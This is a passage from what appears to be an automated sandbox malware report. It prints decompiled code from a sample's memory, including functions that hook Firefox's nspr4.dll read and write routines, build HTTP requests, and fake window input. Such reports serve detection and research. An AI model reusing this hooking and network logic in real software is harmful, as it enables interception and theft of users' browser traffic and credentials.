					DeleteObject(_t15);
				}
				_t16 = _t41[3];
				if(_t16 != 0) {
					CloseHandle(_t16);
				}
				_t17 = _t41[1];
				if(_t17 != 0xffffffff) {
					TlsFree(_t17);
				}
				_t18 = _t41[5];
				if(_t18 != 0) {
					CloseHandle(_t18);
				}
				_t19 = _t41[4];
				if(_t19 != 0) {
					UnmapViewOfFile(_t19);
				}
				_t20 =  *_t41;
				if(_t20 != 0) {
					_t20 = CloseHandle(_t20);
				}
				if(_a4 != 0) {
					_t21 = _t41[0x56];
					if(_t21 != 0) {
						SelectObject(_t41[0x55], _t21);
					}
					_t22 = _t41[0x57];
					if(_t22 != 0) {
						DeleteObject(_t22);
					}
					_t23 = _t41[0x55];
					if(_t23 != 0) {
						DeleteDC(_t23);
					}
					_t24 = _t41[0x58];
					if(_t24 != 0) {
						CloseHandle(_t24);
					}
					_t25 = _t41[0x60];
					if(_t25 != 0 && WaitForSingleObject(_t25, 0) != 0x102) {
						PostThreadMessageW(_t41[0x62], 0x12, 0, 0);
					}
					_t20 = E0040A0A5( &(_t41[0x5f]));
				}
				return _t20;
			}

0x0041b615
0x0041b617
0x0041b61d
0x0041b620
0x0041b620
0x0041b622
0x0041b62d
0x0041b630
0x0041b630
0x0041b632
0x0041b638
0x0041b63b
0x0041b63b
0x0041b641
0x0041b646
0x0041b649
0x0041b649
0x0041b64b
0x0041b650
0x0041b653
0x0041b653
0x0041b659
0x0041b65d
0x0041b660
0x0041b660
0x0041b667
0x0041b669
0x0041b671
0x0041b67a
0x0041b67a
0x0041b680
0x0041b688
0x0041b68b
0x0041b68b
0x0041b68d
0x0041b695
0x0041b698
0x0041b698
0x0041b69e
0x0041b6a6
0x0041b6a9
0x0041b6a9
0x0041b6ab
0x0041b6b3
0x0041b6d1
0x0041b6d1
0x0041b6dd
0x0041b6dd
0x0041b6e5

APIs

DeleteObject.GDI32(?), ref: 0041B620
CloseHandle.KERNEL32(?,00000000,?,?,0041B984,00000001), ref: 0041B630
TlsFree.KERNEL32(?,00000000,?,?,0041B984,00000001), ref: 0041B63B
CloseHandle.KERNEL32(?,00000000,?,?,0041B984,00000001), ref: 0041B649
UnmapViewOfFile.KERNEL32(?,00000000,?,?,0041B984,00000001), ref: 0041B653
CloseHandle.KERNEL32(?,00000000,?,?,0041B984,00000001), ref: 0041B660
SelectObject.GDI32(?,?), ref: 0041B67A
DeleteObject.GDI32(?), ref: 0041B68B
DeleteDC.GDI32(?), ref: 0041B698
CloseHandle.KERNEL32(?,00000000), ref: 0041B6A9
WaitForSingleObject.KERNEL32(?,00000000,00000000), ref: 0041B6B8
PostThreadMessageW.USER32 ref: 0041B6D1

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CloseHandleObject$Delete$FileFreeMessagePostSelectSingleThreadUnmapViewWait
String ID:
API String ID: 1699860549-0
Opcode ID: d6b6472fa95c871c856589a0ac71add0286c8eeda83ebe585ad893e362611b86
Instruction ID: 2f054755cf792d06e13dd06fa325181d02bf3153339df9d70f60b8c12b45171e
Opcode Fuzzy Hash: d6b6472fa95c871c856589a0ac71add0286c8eeda83ebe585ad893e362611b86
Instruction Fuzzy Hash: 5F211D707007019BD7209B79DD48FA7B3EDEF54740F04492AF599E72A0DB38E8848A6D

Uniqueness

Uniqueness Score: -1.00%

Function 00404B7E Relevance: 16.0, APIs: 6, Strings: 3, Instructions: 275
threadwindowCOMMON

Download Yara Rule

C-Code - Quality: 25%

			E00404B7E(void* __eax, signed int _a4, signed int _a8, signed int _a12, signed short _a16) {
				struct HWND__* _v8;
				char _v12;
				struct HWND__* _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed char _v32;
				intOrPtr _v68;
				struct tagWINDOWINFO _v92;
				void* __ebx;
				void* __esi;
				intOrPtr _t107;
				struct HWND__* _t108;
				int _t113;
				int _t114;
				long _t134;
				signed char _t144;
				struct HWND__* _t145;
				long _t148;
				struct HWND__* _t171;
				long _t172;
				void* _t175;

				_t175 = __eax;
				_t107 =  *((intOrPtr*)(__eax + 0x10));
				_v16 = 0;
				if( *((intOrPtr*)(_t107 + 0x110)) == 0) {
					_t108 =  *((intOrPtr*)(_t107 + 0x108));
					_v16 = _t108;
					if(_t108 != 0) {
						_v32 = E0041B6E8(0, __eax, 0) & 0x0000ffff;
					} else {
						_v32 = 0;
					}
				} else {
					if((_a4 & 0x00000001) != 0) {
						E004046ED(_a12, _a8, __eax);
						_a4 = _a4 & 0xfffffffe;
					}
					if((_a4 & 0x00000004) != 0) {
						_push(1);
						_push(0);
						E0040467E(0, _t175, 0);
					}
				}
				_t144 = _a4;
				 *( *(_t175 + 0x10) + 0x100) = _a8;
				_t113 =  *(_t175 + 0x10);
				 *(_t113 + 0x104) = _a12;
				if(_t144 == 0) {
					L69:
					return _t113;
				}
				_v20 = _t144;
				_t26 =  &_v20;
				 *_t26 = _v20 & 0x00000002;
				if( *_t26 == 0) {
					if((_t144 & 0x00000004) == 0) {
						goto L14;
					} else {
						_push(0);
						goto L13;
					}
				} else {
					_push(1);
					L13:
					E0041B6E8(1, _t175);
					L14:
					_v24 = _t144;
					_t31 =  &_v24;
					 *_t31 = _v24 & 0x00000020;
					if( *_t31 == 0) {
						if((_t144 & 0x00000040) == 0) {
							L19:
							_v28 = _t144;
							_t36 =  &_v28;
							 *_t36 = _v28 & 0x00000008;
							if( *_t36 == 0) {
								if((_t144 & 0x00000010) == 0) {
									L24:
									_t114 =  *(_t175 + 0x10);
									_push( *((intOrPtr*)(_t114 + 0x104)));
									_push( *((intOrPtr*)(_t114 + 0x100)));
									0xc00000 = 0x64;
									_t171 = E0040CE07(0xc00000,  &_v12);
									_t113 = _v12 + 0xfffffff6;
									_v8 = _t171;
									if(_t113 <= 7) {
										_t113 = GetWindowLongW(_t171, 0xfffffff0);
										if((_t113 & 0x40000000) != 0 && (_t113 & 0x00c00000) != 0xc00000 && (_t113 & 0x80040000) == 0) {
											_t113 = GetParent(_t171);
											if(_t113 != 0) {
												_v8 = _t113;
												_t171 = _t113;
											}
										}
									}
									if(_t171 == 0) {
										L35:
										_t145 = _v16;
										if(_t145 != 0) {
											_t113 = IsWindow(_t145);
											if(_t113 == 0 || _t171 != 0 && _t145 != _t171 && (_v32 & 0x00000007) == 0) {
												if(_a4 != 0x8001) {
													_push(1);
													_push(0);
													_t113 = E0040467E(0, _t175, 0);
												}
											} else {
												_v8 = _t145;
												_v12 = 1;
												_t171 = _t145;
											}
										}
										goto L43;
									} else {
										_t113 = E0041B33C(_t171);
										if((_t113 & 0x00000040) == 0) {
											goto L35;
										}
										if(_t171 != _v16) {
											_t134 = GetWindowThreadProcessId(_t171, 0);
											_push(1);
											_push(0);
											_t113 = E0040467E(_t171, _t175, _t134);
										}
										_v12 = 1;
										L43:
										if(_t171 == 0) {
											goto L69;
										}
										_v92.cbSize = 0x3c;
										_t113 = GetWindowInfo(_t171,  &_v92);
										if(_t113 == 0) {
											goto L69;
										}
										_t113 = _a8 & 0x0000ffff;
										_t148 = (_a12 & 0x0000ffff) << 0x00000010 | _t113;
										if(_v12 != 1) {
											_t172 = _a4;
										} else {
											_t113 = E0041B33C(_t171);
											if((_t113 & 0x00000020) == 0) {
												_t113 = _a8 - _v92.rcClient & 0x0000ffff;
												_t172 = (_a12 - _v68 & 0x0000ffff) << 0x00000010 | _t113;
											} else {
												_t172 = _t148;
											}
										}
										if(_v20 == 0) {
											if((_a4 & 0x00000004) == 0) {
												goto L55;
											}
											_push(_t148);
											_push(_t172);
											_push(0xa2);
											_push(0x202);
											goto L54;
										} else {
											_push(_t148);
											_push(_t172);
											_push(0xa1);
											_push(0x201);
											L54:
											_push(_v12);
											_push( &_v92);
											_push(_v8);
											_t113 = E004048ED(_t175, 0xc00000);
											L55:
											if(_v24 == 0) {
												if((_a4 & 0x00000040) == 0) {
													L60:
													if(_v28 == 0) {
														if((_a4 & 0x00000010) == 0) {
															L65:
															if((_a4 & 0x00000001) != 0) {
																_t113 = E004048ED(_t175, 0xc00000, _v8,  &_v92, _v12, 0x200, 0xa0, _t172, _t148);
															}
															if((_a4 & 0x00000800) != 0) {
																_t113 = PostMessageW(_v8, 0x20a, (_a16 & 0x0000ffff) << 0x00000010 | E0041B6E8(0, _t175, 0) & 0xffff, _t148);
															}
															goto L69;
														}
														_push(_t148);
														_push(_t172);
														_push(0xa5);
														_push(0x205);
														L64:
														_push(_v12);
														_push( &_v92);
														_push(_v8);
														_t113 = E004048ED(_t175, 0xc00000);
														goto L65;
													}
													_push(_t148);
													_push(_t172);
													_push(0xa4);
													_push(0x204);
													goto L64;
												}
												_push(_t148);
												_push(_t172);
												_push(0xa8);
												_push(0x208);
												L59:
												_push(_v12);
												_push( &_v92);
												_push(_v8);
												_t113 = E004048ED(_t175, 0xc00000);
												goto L60;
											}
											_push(_t148);
											_push(_t172);
											_push(0xa7);
											_push(0x207);
											goto L59;
										}
									}
								}
								_push(0);
								L23:
								E0041B6E8(2, _t175);
								goto L24;
							}
							_push(1);
							goto L23;
						}
						_push(0);
						L18:
						E0041B6E8(4, _t175);
						goto L19;
					}
					_push(1);
					goto L18;
				}
			}

0x00404b86
0x00404b88
0x00404b8e
0x00404b98
0x00404bc4
0x00404bca
0x00404bcf
0x00404be3
0x00404bd1
0x00404bd1
0x00404bd1
0x00404b9a
0x00404b9e
0x00404ba8
0x00404bad
0x00404bad
0x00404bb5
0x00404bb7
0x00404bb9
0x00404bbd
0x00404bbd
0x00404bb5
0x00404bec
0x00404bef
0x00404bf5
0x00404bfb
0x00404c03
0x00404e8a
0x00404e8e
0x00404e8e
0x00404c09
0x00404c0c
0x00404c0c
0x00404c10
0x00404c19
0x00000000
0x00404c1b
0x00404c1b
0x00000000
0x00404c1b
0x00404c12
0x00404c12
0x00404c1c
0x00404c20
0x00404c25
0x00404c25
0x00404c28
0x00404c28
0x00404c2c
0x00404c35
0x00404c41
0x00404c41
0x00404c44
0x00404c44
0x00404c48
0x00404c51
0x00404c5d
0x00404c5d
0x00404c60
0x00404c69
0x00404c71
0x00404c77
0x00404c7c
0x00404c7f
0x00404c85
0x00404c8a
0x00404c95
0x00404cac
0x00404cb4
0x00404cb6
0x00404cb9
0x00404cb9
0x00404cb4
0x00404c95
0x00404cbd
0x00404cec
0x00404cec
0x00404cf1
0x00404cf4
0x00404cfc
0x00404d21
0x00404d23
0x00404d25
0x00404d2b
0x00404d2b
0x00404d0c
0x00404d0c
0x00404d0f
0x00404d16
0x00404d16
0x00404cfc
0x00000000
0x00404cbf
0x00404cc0
0x00404cc7
0x00000000
0x00000000
0x00404ccc
0x00404cd1
0x00404cd7
0x00404cd9
0x00404cde
0x00404cde
0x00404ce3
0x00404d30
0x00404d32
0x00000000
0x00000000
0x00404d3d
0x00404d44
0x00404d4c
0x00000000
0x00000000
0x00404d56
0x00404d5d
0x00404d63
0x00404d8c
0x00404d65
0x00404d66
0x00404d6d
0x00404d85
0x00404d88
0x00404d6f
0x00404d6f
0x00404d6f
0x00404d6d
0x00404d93
0x00404da7
0x00000000
0x00000000
0x00404da9
0x00404daa
0x00404dab
0x00404db0
0x00000000
0x00404d95
0x00404d95
0x00404d96
0x00404d97
0x00404d9c
0x00404db5
0x00404db5
0x00404dbb
0x00404dbc
0x00404dc1
0x00404dc6
0x00404dca
0x00404dde
0x00404dfd
0x00404e01
0x00404e15
0x00404e34
0x00404e38
0x00404e52
0x00404e52
0x00404e5e
0x00404e84
0x00404e84
0x00000000
0x00404e5e
0x00404e17
0x00404e18
0x00404e19
0x00404e1e
0x00404e23
0x00404e23
0x00404e29
0x00404e2a
0x00404e2f
0x00000000
0x00404e2f
0x00404e03
0x00404e04
0x00404e05
0x00404e0a
0x00000000
0x00404e0a
0x00404de0
0x00404de1
0x00404de2
0x00404de7
0x00404dec
0x00404dec
0x00404df2
0x00404df3
0x00404df8
0x00000000
0x00404df8
0x00404dcc
0x00404dcd
0x00404dce
0x00404dd3
0x00000000
0x00404dd3
0x00404d93
0x00404cbd
0x00404c53
0x00404c54
0x00404c58
0x00000000
0x00404c58
0x00404c4a
0x00000000
0x00404c4a
0x00404c37
0x00404c38
0x00404c3c
0x00000000
0x00404c3c
0x00404c2e
0x00000000
0x00404c2e

APIs

GetWindowLongW.USER32(00000000,000000F0), ref: 00404C8A
GetParent.USER32(00000000), ref: 00404CAC
GetWindowThreadProcessId.USER32(?,00000000), ref: 00404CD1
IsWindow.USER32(?), ref: 00404CF4

Part of subcall function 004046ED: WaitForSingleObject.KERNEL32(?,000000FF), ref: 00404701
Part of subcall function 004046ED: ReleaseMutex.KERNEL32(?), ref: 00404720
Part of subcall function 004046ED: GetWindowRect.USER32 ref: 0040472D
Part of subcall function 004046ED: IsRectEmpty.USER32 ref: 004047B1
Part of subcall function 004046ED: GetWindowLongW.USER32(?,000000F0), ref: 004047C0
Part of subcall function 004046ED: GetParent.USER32(?), ref: 004047D6
Part of subcall function 004046ED: MapWindowPoints.USER32 ref: 004047DF
Part of subcall function 004046ED: SetWindowPos.USER32(?,00000000,?,?,?,?,0000630C), ref: 00404803

GetWindowInfo.USER32 ref: 00404D44
PostMessageW.USER32(?,0000020A,00000000,00000002), ref: 00404E84

Part of subcall function 0040467E: WaitForSingleObject.KERNEL32(?,000000FF,7478A660,00404ABA,00000000), ref: 00404684
Part of subcall function 0040467E: ReleaseMutex.KERNEL32(?), ref: 004046B8
Part of subcall function 0040467E: IsWindow.USER32(?), ref: 004046BF
Part of subcall function 0040467E: PostMessageW.USER32(?,00000215,00000000,?), ref: 004046D9

Strings

<, xrefs: 00404D3D
, xrefs: 00404C28
@, xrefs: 00404DDA

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Window$LongMessageMutexObjectParentPostRectReleaseSingleWait$EmptyInfoPointsProcessThread
String ID: $<$@
API String ID: 3705211839-2197183666
Opcode ID: 9cf29b341c9d1baedaaa478855209b5021cfdea1e7ad0d3fa9f833038f56833c
Instruction ID: a285a7bfb08b4ee5f31c8daff43940cc1629ab9f6c1008a9794622409c7bf251
Opcode Fuzzy Hash: 9cf29b341c9d1baedaaa478855209b5021cfdea1e7ad0d3fa9f833038f56833c
Instruction Fuzzy Hash: 519192B0604308AAEB119F95C989FFF7BB4AFC1748F14402AFA41762D1C7BC9A81D759

Uniqueness

Uniqueness Score: -1.00%

Function 0040A37C Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 67
networkCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E0040A37C(void* _a4, long _a8, void* _a12, long _a16, void _a20) {
				long _t18;
				char* _t21;
				signed int _t29;
				char* _t30;
				void* _t32;

				_t29 = _a20 & 0x00000002;
				_t18 = 0x8404f700;
				if(_t29 != 0) {
					_t18 = 0x8444f700;
				}
				if((_a20 & 0x00000004) != 0) {
					_t18 = _t18 | 0x00800000;
				}
				_t30 = "POST";
				if((_a20 & 0x00000001) == 0) {
					_t30 = "GET";
				}
				_t32 = HttpOpenRequestA(_a4, _t30, _a8, "HTTP/1.1", 0, "l2@", _t18, 0);
				if(_t32 == 0) {
					L15:
					return 0;
				} else {
					if(_t29 == 0) {
						_push(0x13);
						_t21 = "Connection: close\r\n";
						_pop(0);
					} else {
						_t21 = 0;
					}
					if(HttpSendRequestA(_t32, _t21, 0, _a12, _a16) == 0) {
						L14:
						InternetCloseHandle(_t32);
						goto L15;
					} else {
						_a20 = _a20 & 0x00000000;
						_a8 = 4;
						if(HttpQueryInfoA(_t32, 0x20000013,  &_a20,  &_a8, 0) == 0 || _a20 != 0xc8) {
							goto L14;
						} else {
							return _t32;
						}
					}
				}
			}

0x0040a383
0x0040a387
0x0040a38c
0x0040a38e
0x0040a38e
0x0040a397
0x0040a399
0x0040a399
0x0040a3a2
0x0040a3a7
0x0040a3a9
0x0040a3a9
0x0040a3ca
0x0040a3ce
0x0040a42e
0x00000000
0x0040a3d0
0x0040a3d2
0x0040a3da
0x0040a3dc
0x0040a3e1
0x0040a3d4
0x0040a3d4
0x0040a3d6
0x0040a3f3
0x0040a427
0x0040a428
0x00000000
0x0040a3f5
0x0040a3f5
0x0040a409
0x0040a418
0x00000000
0x0040a423
0x00000000
0x0040a423
0x0040a418
0x0040a3f3

APIs

HttpOpenRequestA.WININET(?,POST,?,HTTP/1.1,00000000,l2@,8404F700,00000000), ref: 0040A3C4
HttpSendRequestA.WININET(00000000,Connection: close,00000013,?,?), ref: 0040A3EB
HttpQueryInfoA.WININET(00000000,20000013,00000000,?,00000000), ref: 0040A410
InternetCloseHandle.WININET(00000000), ref: 0040A428

Strings

l2@, xrefs: 0040A3B1
GET, xrefs: 0040A3A9
HTTP/1.1, xrefs: 0040A3B8
POST, xrefs: 0040A3A2, 0040A3C0
Connection: close, xrefs: 0040A3DC, 0040A3E9

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: Http$Request$CloseHandleInfoInternetOpenQuerySend
String ID: Connection: close$GET$HTTP/1.1$POST$l2@
API String ID: 3080274660-1687453741
Opcode ID: b783731ffcf3f9264d21c75d9d2af224a07c9e3dc92ca94c593c224cd6b7fd58
Instruction ID: 9e98d85218f575a9f318a60fe21cb7794474a491b8953bd764b223e2a1d89644
Opcode Fuzzy Hash: b783731ffcf3f9264d21c75d9d2af224a07c9e3dc92ca94c593c224cd6b7fd58
Instruction Fuzzy Hash: 7211513125031A6BEB218F50DC49FEB3A9C9B14759F504036FE01F92D0D7B8D92097EA

Uniqueness

Uniqueness Score: -1.00%

Function 00416806 Relevance: 15.1, APIs: 10, Instructions: 102
synchronizationwindowthreadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00416806(void* __eax, signed int __ecx, void* __edx, RECT* __edi, long _a4, intOrPtr _a8) {
				char _v5;
				signed char _v12;
				struct tagRECT _v28;
				void* __ebx;
				void* __esi;
				signed char _t36;
				char _t38;
				intOrPtr _t40;
				void* _t67;
				struct HDC__** _t68;
				void* _t71;
				RECT* _t72;

				_t72 = __edi;
				_t71 = __edx;
				_t69 = __ecx;
				_t67 = __eax;
				_t36 = E0041B33C(_a4) & 0x0000ffff;
				_v12 = _t36;
				if((_t36 & 0x00000001) != 0) {
					L13:
					return 1;
				}
				_t38 = E0041B794(_t71, _t67, _a4);
				_v5 = _t38;
				if(_t38 == 0 || (_v12 & 0x00000010) != 0) {
					L5:
					if(E004166A2(_t67, _t69) == 0) {
						L11:
						_t40 = _a8;
						if(( *(_t40 + 0x24) & 0x40000000) == 0) {
							IntersectRect( &_v28, _t40 + 4, _t72);
							_t68 = _t67 + 0x154;
							FillRect( *_t68,  &_v28, 6);
							DrawEdge( *_t68,  &_v28, 0xa, 0xf);
						}
						goto L13;
					}
					E004086CB( *((intOrPtr*)(_t67 + 0x10)) + 0x114, _t72, 0x10);
					ResetEvent( *(_t67 + 0xc));
					if(PostThreadMessageW( *(_t67 + 0x188),  *(_t67 + 8), 0xfffffffc, _a4) == 0) {
						goto L11;
					}
					if(WaitForSingleObject( *(_t67 + 0xc), 0x3e8) != 0) {
						TerminateProcess( *(_t67 + 0x17c), 0);
						E0040A0A5(_t67 + 0x17c);
						goto L11;
					}
					if( *((char*)( *((intOrPtr*)(_t67 + 0x10)) + 0x124)) != 1) {
						goto L11;
					}
					return _v5;
				} else {
					ResetEvent( *(_t67 + 0xc));
					_t69 =  *__edi & 0x0000ffff;
					if(PostMessageW(_a4,  *(_t67 + 8), (__edi->top & 0x0000ffff) << 0x00000010 |  *__edi & 0x0000ffff, (__edi->bottom & 0x0000ffff) << 0x00000010 | __edi->right & 0x0000ffff) == 0 || WaitForSingleObject( *(_t67 + 0xc), 0x64) != 0) {
						goto L5;
					} else {
						goto L13;
					}
				}
			}

0x00416806
0x00416806
0x00416806
0x00416811
0x00416818
0x0041681b
0x00416820
0x00416934
0x00000000
0x00416934
0x0041682b
0x00416836
0x0041683b
0x00416886
0x0041688d
0x004168f5
0x004168f5
0x004168ff
0x0041690a
0x00416916
0x0041691e
0x0041692e
0x0041692e
0x00000000
0x004168ff
0x0041689b
0x004168a3
0x004168bb
0x00000000
0x00000000
0x004168cd
0x004168ea
0x004168f0
0x00000000
0x004168f0
0x004168d9
0x00000000
0x00000000
0x00000000
0x00416843
0x00416846
0x00416855
0x00416871
0x00000000
0x00000000
0x00000000
0x00000000
0x00416871

APIs

Part of subcall function 0041B33C: GetClassNameW.USER32 ref: 0041B357

Part of subcall function 0041B794: GetWindowThreadProcessId.USER32(?,?), ref: 0041B7A1

ResetEvent.KERNEL32(?,?,?), ref: 00416846
PostMessageW.USER32(00000010,00000010,?,?), ref: 00416869
WaitForSingleObject.KERNEL32(?,00000064), ref: 00416878
ResetEvent.KERNEL32(?,?,?,00000010,?,?), ref: 004168A3
PostThreadMessageW.USER32 ref: 004168B3
WaitForSingleObject.KERNEL32(?,000003E8,?,00000010,?,?), ref: 004168C5
TerminateProcess.KERNEL32(?,00000000,?,00000010,?,?), ref: 004168EA
IntersectRect.USER32 ref: 0041690A
FillRect.USER32 ref: 0041691E
DrawEdge.USER32(?,?,0000000A,0000000F), ref: 0041692E

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: EventMessageObjectPostProcessRectResetSingleThreadWait$ClassDrawEdgeFillIntersectNameTerminateWindow
String ID:
API String ID: 3822129886-0
Opcode ID: a2f7e56cfcb6ba099e907b0609417580ae54f9a18e0571b6fbee1c6e9179c02c
Instruction ID: 44d08d0306d1576fa0c9dc107828547ca88b877705a0183c28af07f27415c66c
Opcode Fuzzy Hash: a2f7e56cfcb6ba099e907b0609417580ae54f9a18e0571b6fbee1c6e9179c02c
Instruction Fuzzy Hash: 9A31D230500214BBEF106F64CE45BEA7B68AF04754F0540BAFD44EA2B2C779C891DBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00419A22 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 86
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00419A22(void* __ecx, void* __edx, void* __eflags) {
				long _v8;
				signed int _v12;
				void _v532;
				void* __edi;
				unsigned int _t22;
				void* _t30;
				void* _t39;
				void* _t41;
				WCHAR* _t42;
				void* _t43;
				void* _t46;

				_t41 = __edx;
				_t39 = __ecx;
				InitializeCriticalSection(0x421da4);
				 *0x421d34 = 0;
				 *0x421da0 = 0;
				 *0x421d9c = 0;
				 *0x421864 = 0;
				 *0x42124c = 0;
				 *0x421250 = 0;
				InitializeCriticalSection(0x421234);
				_t42 =  &_v532;
				E0041A0E0(_t39, _t42, 0);
				_v12 = _v12 | 0xffffffff;
				_v8 = 0x1fe;
				_t43 = CreateFileW(_t42, 0x80000000, 1, 0, 3, 0, 0);
				if(_t43 != 0xffffffff) {
					if(ReadFile(_t43,  &_v532, _v8,  &_v8, 0) != 0) {
						_v12 = _v8;
					}
					CloseHandle(_t43);
				}
				_t22 = _v12;
				if(_t22 == 0xffffffff || (_t22 & 0x00000001) != 0) {
					_t22 = 0;
				}
				 *((short*)(_t46 + (_t22 >> 1) * 2 - 0x210)) = 0;
				E0040F04C( &_v532);
				E004058D8( &_v532, _t41);
				 *0x4203e8 = 0;
				 *0x420404 = 0;
				InitializeCriticalSection(0x4203ec);
				E0041B7D4(_t41);
				if(GetModuleHandleW(L"nspr4.dll") == 0) {
					_t30 = 0;
				} else {
					_t30 = E00416DD3(0, _t41, _t29);
				}
				if(_t30 != 0) {
					 *0x420420 =  *0x420420 | 0x00000001;
				}
				E00416B9C();
				return 1;
			}

0x00419a22
0x00419a22
0x00419a39
0x00419a44
0x00419a4a
0x00419a50
0x00419a56
0x00419a5c
0x00419a62
0x00419a68
0x00419a6b
0x00419a71
0x00419a76
0x00419a89
0x00419a96
0x00419a9b
0x00419ab5
0x00419aba
0x00419aba
0x00419abe
0x00419abe
0x00419ac4
0x00419aca
0x00419ad0
0x00419ad0
0x00419ad6
0x00419ae4
0x00419aef
0x00419af9
0x00419aff
0x00419b05
0x00419b07
0x00419b19
0x00419b24
0x00419b1b
0x00419b1d
0x00419b1d
0x00419b28
0x00419b2a
0x00419b2a
0x00419b31
0x00419b3c

APIs

InitializeCriticalSection.KERNEL32(00421DA4), ref: 00419A39
InitializeCriticalSection.KERNEL32(00421234), ref: 00419A68

Part of subcall function 0041A0E0: PathRenameExtensionW.SHLWAPI(?,.dat,?,004218C8,00000000,00000032,?), ref: 0041A159

CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00419A90
ReadFile.KERNEL32(00000000,?,000001FE,000001FE,00000000), ref: 00419AAD
CloseHandle.KERNEL32(00000000), ref: 00419ABE
InitializeCriticalSection.KERNEL32(004203EC), ref: 00419B05
GetModuleHandleW.KERNEL32(nspr4.dll), ref: 00419B11

Strings

nspr4.dll, xrefs: 00419B0C

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: CriticalInitializeSection$FileHandle$CloseCreateExtensionModulePathReadRename
String ID: nspr4.dll
API String ID: 1155594396-741017701
Opcode ID: b0bdf343433321fd1b19a020efbcde3c8f00dd6531b47e7cb89155d8c3141f7e
Instruction ID: c8f30b8dd07c968f6fca1b93bf81015898036a06cb824bb8f14c60d13574667c
Opcode Fuzzy Hash: b0bdf343433321fd1b19a020efbcde3c8f00dd6531b47e7cb89155d8c3141f7e
Instruction Fuzzy Hash: 6121CE70610248AAC720EF68AC85AEE7BB8EB40354F50057BE410E22B1D7786D86CB2D

Uniqueness

Uniqueness Score: -1.00%

Function 00416DD3 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 36
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00416DD3(void* __ecx, void* __edx, struct HINSTANCE__* __edi) {
				void* __ebx;
				_Unknown_base(*)()* _t4;
				void* _t9;
				void* _t10;
				void* _t11;
				void* _t12;

				_t12 = __edx;
				_t11 = __ecx;
				 *0x420348 = GetProcAddress(__edi, "PR_OpenTCPSocket");
				 *0x420358 = GetProcAddress(__edi, "PR_Close");
				 *0x420368 = GetProcAddress(__edi, "PR_Read");
				_t4 = GetProcAddress(__edi, "PR_Write");
				_push(0x420348);
				_t9 = 4;
				 *0x420378 = _t4;
				_t10 = E00416B0B(_t9, _t11, _t12);
				if(_t10 != 0) {
					E00405978(__edi,  *0x420350,  *0x420360,  *0x420370,  *0x420380);
				}
				return _t10;
			}

0x00416dd3
0x00416dd3
0x00416de9
0x00416df6
0x00416e03
0x00416e08
0x00416e0a
0x00416e11
0x00416e12
0x00416e1c
0x00416e20
0x00416e3c
0x00416e3c
0x00416e45

APIs

GetProcAddress.KERNEL32(?,PR_OpenTCPSocket), ref: 00416DE1
GetProcAddress.KERNEL32(?,PR_Close), ref: 00416DEE
GetProcAddress.KERNEL32(?,PR_Read), ref: 00416DFB
GetProcAddress.KERNEL32(?,PR_Write), ref: 00416E08

Part of subcall function 00416B0B: VirtualAllocEx.KERNEL32(000000FF,00000000,00000004,00003000,00000040,?,76D84EE0,?,?,00416E1C,00420348), ref: 00416B42

Part of subcall function 00405978: InitializeCriticalSection.KERNEL32(004203C0,76D84EE0,00416E41,00420348), ref: 0040598E
Part of subcall function 00405978: GetProcAddress.KERNEL32(?,PR_GetNameForIdentity), ref: 004059CA
Part of subcall function 00405978: GetProcAddress.KERNEL32(PR_SetError), ref: 004059DC
Part of subcall function 00405978: GetProcAddress.KERNEL32(PR_GetError), ref: 004059EE

Strings

PR_OpenTCPSocket, xrefs: 00416DDB
PR_Close, xrefs: 00416DE3
PR_Read, xrefs: 00416DF0
PR_Write, xrefs: 00416DFD

Memory Dump Source

Source File: 00000000.00000002.420457127.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.420478874.0000000000423000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_6qr4g3TReL.jbxd

Similarity

API ID: AddressProc$AllocCriticalInitializeSectionVirtual
String ID: PR_Close$PR_OpenTCPSocket$PR_Read$PR_Write
API String ID: 1833644279-3954199073
Opcode ID: c73055985ab30a5e48a86eee594649916fe3f922dabfbc2ea5ea88317928f1be
Instruction ID: 558d1abf2c47ca9df71e61daa44859a7a791566459144e3209464c1e1cd5ac4e
Opcode Fuzzy Hash: c73055985ab30a5e48a86eee594649916fe3f922dabfbc2ea5ea88317928f1be
